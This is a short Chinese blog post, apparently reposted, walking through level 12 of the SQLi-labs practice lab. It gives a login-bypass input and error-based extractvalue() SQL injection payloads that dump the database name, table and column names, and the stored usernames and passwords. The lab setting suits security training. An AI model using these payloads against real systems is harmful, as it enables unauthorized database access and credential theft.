首页 > 数据库技术 > 详细

SQLI DUMB SERIES-12

时间:2019-04-14 14:56:53      阅读:118      评论:0      收藏:0      [点我收藏+]

(1)检测闭合方式:在username上输入" admin" "

技术分享图片

说明输入的username后还有双引号和括号

方法一:

(2)通过其他途径知道用户名即可。如 输入" admin")# "

技术分享图片

方法二:

(3)构造即可闭合又可报错的语句,在username处输入

爆库payload:

admin"  and extractvalue(1,concat(0x7e,(select database())))  and "

 技术分享图片

爆表名payload:

admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and "

 技术分享图片

爆user表的列名payload:

admin"  and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘)))  and "

 技术分享图片

爆user表值payload:

admin"  and extractvalue(1,concat(0x7e,(select group_concat(username,‘~‘,password) from users)))  and "

 技术分享图片

其他值

技术分享图片

SQLI DUMB SERIES-12

原文:https://www.cnblogs.com/momoli/p/10705010.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!